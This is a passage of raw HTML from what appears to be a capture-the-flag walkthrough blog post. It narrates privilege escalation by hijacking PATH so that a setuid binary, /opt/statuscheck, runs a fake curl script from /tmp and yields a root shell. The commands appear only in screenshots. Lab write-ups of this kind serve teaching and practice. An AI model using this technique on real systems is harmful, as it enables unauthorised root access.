/&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Improving the shell and changing to user &lt;b&gt;helios&lt;/b&gt;&#39; home folder:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhcn8vjDu_eijPUdEgxG8Zqt_tSX2Np9HoobWhsSZkatDzFJok7wnEtfOq6vIFx4QWORBAzCwwOpHsUz3v34eP2I_dCXCmZTNeQRJay2nWSHJAe3P6Kl7FiEqqSnmx8aXB1rIGbWV9ej9ddaGyXKhKqFqgKR--Y42iG5fh9cmwg4DG8r5hem5lhw6FPYg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;50&quot; data-original-width=&quot;577&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhcn8vjDu_eijPUdEgxG8Zqt_tSX2Np9HoobWhsSZkatDzFJok7wnEtfOq6vIFx4QWORBAzCwwOpHsUz3v34eP2I_dCXCmZTNeQRJay2nWSHJAe3P6Kl7FiEqqSnmx8aXB1rIGbWV9ej9ddaGyXKhKqFqgKR--Y42iG5fh9cmwg4DG8r5hem5lhw6FPYg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhON7ITzJjqKoHblSf3DweQap5UG2a8dn84Mq6pxT2Zh-5LCiWLs4R7tA4Z3HEEQYAFXK7WyS58Ek7c6c3CHosE44KiosjsMBMosBIij6w8zvLSGZ9jPwekWclKA9i49qh_WctsFKDU2_Z0TN_7b5sPeyvA776TCwWOtCAMBJwM1I-iB2GY8p-psh56WQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;71&quot; data-original-width=&quot;1016&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhON7ITzJjqKoHblSf3DweQap5UG2a8dn84Mq6pxT2Zh-5LCiWLs4R7tA4Z3HEEQYAFXK7WyS58Ek7c6c3CHosE44KiosjsMBMosBIij6w8zvLSGZ9jPwekWclKA9i49qh_WctsFKDU2_Z0TN_7b5sPeyvA776TCwWOtCAMBJwM1I-iB2GY8p-psh56WQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEig3TZpG31tAFhsqkz1zN_srdqEQRJ_0U_e0AKs5k0tr9QPVldaSiwayiQXbKAQCoQZcBr7xGtLFLo9lrO65ROemwCAKLtPk3wOcx_aRNrEKpk8Yc_0PIZJ0VJl861OmAxnEX9K2Edz7OdZ9ROc5zXmXVcXBDzV2xmi7GklW3F4SSDoRcTECg-ZWZOlsw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;76&quot; data-original-width=&quot;643&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEig3TZpG31tAFhsqkz1zN_srdqEQRJ_0U_e0AKs5k0tr9QPVldaSiwayiQXbKAQCoQZcBr7xGtLFLo9lrO65ROemwCAKLtPk3wOcx_aRNrEKpk8Yc_0PIZJ0VJl861OmAxnEX9K2Edz7OdZ9ROc5zXmXVcXBDzV2xmi7GklW3F4SSDoRcTECg-ZWZOlsw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for files with bit&amp;nbsp;&lt;b&gt;Setuid:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjikkwFuiUrUkWRiFLU_C5j9igCxmmnkKaMglW1rt9xIPyrKJt9gxU0t1v-zQ6ar51444DnYb9U6Xw5gdtvcwbqJp_gd2JLQAkvwFhhu5kfwaXfRdehVyaHn4gYSYryb3kVV2s2UbiQUVmblyjMYHyT645EvVd-Ip2_3m6zBnTRjApmfIICPTN_NNDBcA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;354&quot; data-original-width=&quot;755&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjikkwFuiUrUkWRiFLU_C5j9igCxmmnkKaMglW1rt9xIPyrKJt9gxU0t1v-zQ6ar51444DnYb9U6Xw5gdtvcwbqJp_gd2JLQAkvwFhhu5kfwaXfRdehVyaHn4gYSYryb3kVV2s2UbiQUVmblyjMYHyT645EvVd-Ip2_3m6zBnTRjApmfIICPTN_NNDBcA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Exploring &lt;b&gt;/opt/statuscheck&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh5QjBohYG4s2M3uN6oafbbsRcTNVdytmFa4zk0yQtm39ky9Y_HYlbfASrR0WYcaZVhhM_EWI1Zz491s-h8ukwvemGkU511hkUDnE4fZj1OoTgQEZKkAQou_gylX2t-XSEdz4w69R3EM7CJG1O3te75digZQDtQxZqz_-ejjrTHVNucg6rAM73Bjy02Sg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;164&quot; data-original-width=&quot;678&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh5QjBohYG4s2M3uN6oafbbsRcTNVdytmFa4zk0yQtm39ky9Y_HYlbfASrR0WYcaZVhhM_EWI1Zz491s-h8ukwvemGkU511hkUDnE4fZj1OoTgQEZKkAQou_gylX2t-XSEdz4w69R3EM7CJG1O3te75digZQDtQxZqz_-ejjrTHVNucg6rAM73Bjy02Sg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- Applying command &lt;b&gt;strings&lt;/b&gt; to&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;/opt/statuscheck&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgDcCc5H4W3FPTAn6LU-_ssYTOyV0UmAu7Piqvuce5PVY_jUGbVa0-qhQXilpyPbrF1L-q0-u_BUm_mGNKu1RAE_3N3n8Iv9kocDyLinXNQbVdn5B-PnfCSXLk5Iu4dAzPSH2-Dz5A7yDrYLtOiBuwlXFOeFriAxuDuY-NoqQ9bj5w8HVNAMGJVCKCT_g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;390&quot; data-original-width=&quot;610&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgDcCc5H4W3FPTAn6LU-_ssYTOyV0UmAu7Piqvuce5PVY_jUGbVa0-qhQXilpyPbrF1L-q0-u_BUm_mGNKu1RAE_3N3n8Iv9kocDyLinXNQbVdn5B-PnfCSXLk5Iu4dAzPSH2-Dz5A7yDrYLtOiBuwlXFOeFriAxuDuY-NoqQ9bj5w8HVNAMGJVCKCT_g=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- So it happens that&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;/opt/statuscheck &lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;runs&lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt; curl &lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;directly, with no path.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;- The idea to Privilege Escalation would be to redo &lt;b&gt;curl&lt;/b&gt; as a bash script, store it at &lt;b&gt;/tmp&lt;/b&gt;, and change the variable &lt;b&gt;PATH&lt;/b&gt; so that &lt;b&gt;curl&lt;/b&gt; is run directly from &lt;b&gt;/tmp&lt;/b&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The original path for &lt;b&gt;curl&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhEJ3CdveAe6rqKaE_fZ0y848CAfU5EHJJmwXxjwvBwpsa9WPId4eGF1EeLLMfY38GrJbqi14xoBoNdjxDlQsFCPfNI_4IjUnVwK7cBmFdveTIc6RSxXlkHqCmMm8n7DvTdsJUS0i1X3ARnTRzWejiMq3axuNN-BZEnPYinNnKPNdaKESW-_znRHeV-_w&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;72&quot; data-original-width=&quot;456&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhEJ3CdveAe6rqKaE_fZ0y848CAfU5EHJJmwXxjwvBwpsa9WPId4eGF1EeLLMfY38GrJbqi14xoBoNdjxDlQsFCPfNI_4IjUnVwK7cBmFdveTIc6RSxXlkHqCmMm8n7DvTdsJUS0i1X3ARnTRzWejiMq3axuNN-BZEnPYinNnKPNdaKESW-_znRHeV-_w=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;clear: left; float: left; font-family: arial; font-size: medium; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;416&quot; data-original-width=&quot;1074&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhkRt8wt_y1ksPNO4Qfsk_Mt9fASXxpsZYDdubUwJ7YgwhCKCSRgiCxOH26_zp-bDZNFN4i9N-KFzYvsGGyDjoXbiE9HjjsS_ms6iienOH7hS2_45KQMa1dHqWKejb9fT6ynufe-CCkor4oqzMM7sJy6eebFbbJI2fXVSj21gw-w6aXrs7ZaWnVFnkLLg=s16000&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to &lt;b&gt;/tmp&lt;/b&gt; and creating a new &lt;b&gt;curl&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh8wcUqpR39esa5x2doXGDdxakTHC8SYzIZ44FltcLcTHc3D8QQoLUABamBvE7xFfsv4JY8GUrCeg3JwwpA9ZvHzSogE6FoZfUBYOWPFFGN7yv-3TqcrYy1EspEfUFbC4x5fwaIO7BwwhMT3_aG8zmuFDE3wjIl8dlzY-_AOsf1I8moEavifPT9zRI6lw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;144&quot; data-original-width=&quot;492&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh8wcUqpR39esa5x2doXGDdxakTHC8SYzIZ44FltcLcTHc3D8QQoLUABamBvE7xFfsv4JY8GUrCeg3JwwpA9ZvHzSogE6FoZfUBYOWPFFGN7yv-3TqcrYy1EspEfUFbC4x5fwaIO7BwwhMT3_aG8zmuFDE3wjIl8dlzY-_AOsf1I8moEavifPT9zRI6lw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Editing PATH by including&amp;nbsp;&lt;b&gt;/tmp&lt;/b&gt; to the beginning:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjrO2g1aPjrHhXs0MiRHT60uQHpTkYJmbwRIvalsLNTM55MkBw5POjWC975K986DFBu_tRBF1617rCLW_isko4iwBemndc2Bqm37F7GA58LUF9ltRn3I9wXq-_mLIQ1jdGdIrmMvHfG0KEsGorToPxgtlWdHMNeBW1dXNc0D2wbTjZtEkSiVfDasn6XVg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;53&quot; data-original-width=&quot;550&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjrO2g1aPjrHhXs0MiRHT60uQHpTkYJmbwRIvalsLNTM55MkBw5POjWC975K986DFBu_tRBF1617rCLW_isko4iwBemndc2Bqm37F7GA58LUF9ltRn3I9wXq-_mLIQ1jdGdIrmMvHfG0KEsGorToPxgtlWdHMNeBW1dXNc0D2wbTjZtEkSiVfDasn6XVg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEig3pU8cAIOfhX0F2HYDMYA9nVrYw1AKrW6Uz0vc4ZmwrrORiHyJ1BNdyiStF8cqR8375PJDqLZnc3mNpbdtjwJdVH0JXUCWF_7rPTN12kJjp4dZrbbS6fCj6MMK8l17Ks9VVY_O4FrsGecWjdZBrusy86DqbgGBh7jyw51HNwSXkVJ1wPeSYtltyu6_g&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;74&quot; data-original-width=&quot;853&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEig3pU8cAIOfhX0F2HYDMYA9nVrYw1AKrW6Uz0vc4ZmwrrORiHyJ1BNdyiStF8cqR8375PJDqLZnc3mNpbdtjwJdVH0JXUCWF_7rPTN12kJjp4dZrbbS6fCj6MMK8l17Ks9VVY_O4FrsGecWjdZBrusy86DqbgGBh7jyw51HNwSXkVJ1wPeSYtltyu6_g=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg_fEpSJRqRGpGf527bKgfEEXkNIOCXz7KWitOKPig7RoFq3bNwx5i2XG2vrsEG0fq30DOIUKNoDh5bL_baxXDroNnBtsMMWNiWrngjIL5Mx__gk8V4scA4L8K7I8zoCG5aB2otwLLACDOBQw-cIP0I3AFveqIxU4CzHj0l5Cu_w2XoVJGZvVdQiY1d5Q&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;422&quot; data-original-width=&quot;906&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg_fEpSJRqRGpGf527bKgfEEXkNIOCXz7KWitOKPig7RoFq3bNwx5i2XG2vrsEG0fq30DOIUKNoDh5bL_baxXDroNnBtsMMWNiWrngjIL5Mx__gk8V4scA4L8K7I8zoCG5aB2otwLLACDOBQw-cIP0I3AFveqIxU4CzHj0l5Cu_w2XoVJGZvVdQiY1d5Q=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now&amp;nbsp;&lt;b&gt;/opt/statuscheck&lt;/b&gt;&amp;nbsp;calls &lt;b&gt;curl&lt;/b&gt; inside &lt;b&gt;/tmp&lt;/b&gt; and a root shell is achieved:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a 